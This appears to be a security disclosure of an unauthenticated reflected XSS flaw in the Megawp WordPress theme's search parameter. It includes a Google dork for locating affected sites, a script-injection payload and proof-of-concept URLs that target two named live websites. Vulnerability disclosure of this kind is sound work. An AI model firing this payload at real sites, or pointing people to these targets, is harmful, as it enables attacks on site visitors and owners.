- # VULNERABILITY: Megawp WordPress Theme - Unauthenticated Reflected XSS
- # GOOGLE DORK: Megawp-Theme
- # DATE: 2021-02-10
- # SECURITY RESEARCHER: EbRaHiM-VaKeR [ https://ebrahim-ghiasi.ir ]
- # VENDOR: Megawp-Theme [ http://megawp.almastheme.com/megawp-demos/ ]
- # SOFTWARE VERSION: <= 1
- # SOFTWARE LINK: https://www.zhaket.com/web/megawp-wordpress-theme
- # CVE: N/A
*/
### -- [ Info: ]
[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Megawp-Theme for WordPress.
[i] Vulnerable parameter(s): ?s=
### -- [ Impact: ]
[~] code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
### -- [ Payload: ]
[$] ?s="><script>alert(`hacked`)</script>
### -- [ PoC | Unauthenticated Reflected XSS | Search query: ]
[!] https://lms.golvani.ir/?s=%22%3E%3Cscript%3Ealert(`hacked`)%3C/script%3E
[!] https://baameshimi.ir/?s=%22%3E%3Cscript%3Ealert(`hacked`)%3C/script%3E
### -- [ Contacts: ]
[+] Website: ebrahim-ghiasi.ir
[+] Telegram: @hajit00n